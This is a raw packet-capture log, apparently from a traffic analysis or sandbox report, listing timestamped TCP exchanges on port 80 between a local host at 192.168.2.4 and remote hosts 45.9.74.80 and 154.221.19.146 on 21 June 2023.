                                                                                                  Jun 21, 2023 20:24:10.970305920 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.970330000 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970375061 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970392942 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.970421076 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970479012 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970532894 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970541000 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.970581055 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970628023 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970657110 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.970674038 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970685959 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.970720053 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970765114 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970774889 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.970812082 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970856905 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970873117 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.970906019 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970937967 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970971107 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.971018076 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.971024036 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.971024036 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.971087933 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.971134901 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.971148968 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.971179962 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.971227884 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.971275091 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.971276999 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.971548080 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.996185064 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996259928 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996340036 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996387959 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996433973 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996447086 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.996447086 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.996488094 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996546984 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996551037 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.996603966 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.996608019 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996659040 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996718884 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996730089 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.996781111 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996839046 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996851921 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.996886015 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.996892929 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.996951103 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997011900 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.997016907 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997083902 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997145891 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.997148991 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997212887 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997212887 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.997276068 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997380972 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997410059 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.997447968 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997514009 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997514009 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.997585058 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997592926 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.997649908 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997714996 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997718096 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.997777939 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997840881 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.997843981 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997900963 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.997963905 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998011112 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998038054 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998074055 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998128891 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998142004 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998176098 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998189926 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998224020 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998269081 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998295069 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998313904 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998359919 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998378038 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998406887 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998451948 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998497963 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998518944 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998547077 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998580933 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998614073 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998631954 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998636961 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998678923 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998724937 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998743057 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998771906 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998817921 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998832941 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998864889 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998909950 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.998925924 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.998956919 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999002934 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999047995 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999063969 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.999094963 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999140978 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999166012 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.999188900 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999206066 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.999237061 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999280930 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999306917 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.999326944 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999373913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999397039 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.999418974 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999464989 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999512911 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999526978 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.999583960 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999654055 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999655962 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.999703884 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999731064 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.999748945 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999793053 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999836922 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999861002 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.999880075 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999924898 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.999939919 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.999980927 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.025644064 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.025716066 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.025832891 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.026036978 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026109934 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026200056 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026201963 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.026285887 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026355982 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026381016 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.026426077 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026494026 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026510954 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.026563883 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026626110 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.026633024 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026700974 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026762962 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026808977 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026829004 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.026909113 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026954889 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.026988029 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027021885 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.027038097 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027085066 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027129889 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027143002 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.027179003 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027221918 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027246952 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.027267933 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027313948 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027331114 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.027360916 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027374983 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.027405977 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027450085 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027470112 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.027496099 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027558088 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027621031 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027647972 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.027668953 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027710915 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.027715921 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027762890 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027791977 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.027807951 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027853012 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027898073 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027918100 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.027945042 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.027988911 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028008938 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.028050900 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028120995 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.028151035 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028196096 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028218985 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.028240919 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028311014 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.028312922 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028361082 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028420925 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028419971 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.028467894 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028522968 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028574944 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028574944 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.028634071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028636932 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.028691053 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.028772116 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.051340103 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.051414013 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.051479101 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.051528931 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.051549911 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.051615000 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.051680088 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.051686049 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.051748991 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.051815033 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.051817894 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.051881075 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.051898956 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.051948071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.051997900 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052016020 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052046061 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052090883 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052126884 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052174091 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052180052 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052220106 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052227020 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052293062 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052340031 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052366972 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052386045 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052432060 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052445889 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052478075 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052524090 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052548885 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052568913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052613020 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052629948 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052655935 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052700996 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052721024 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052746058 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052768946 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052791119 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052838087 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052859068 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052882910 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052928925 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.052953005 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.052973032 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053018093 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053061962 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053081036 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.053107023 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053152084 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053165913 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.053198099 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053241014 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053261042 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.053284883 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053307056 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.053329945 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053373098 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053416967 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053443909 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.053459883 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053504944 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053522110 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.053554058 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053596973 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053623915 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.053642035 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053656101 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.053689003 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053755999 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.053889990 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053936005 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.053982973 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054011106 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.054028034 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054071903 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054105043 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054136992 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054172039 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.054183006 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054228067 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054274082 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054296017 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.054320097 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054363966 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054384947 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.054408073 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054452896 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054496050 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054495096 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.054517984 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.054542065 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054586887 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054610014 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.054631948 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054677010 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054712057 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.054722071 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054768085 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054811001 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:11.054836035 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:11.054855108 CEST804971945.9.74.80192.168.2.4
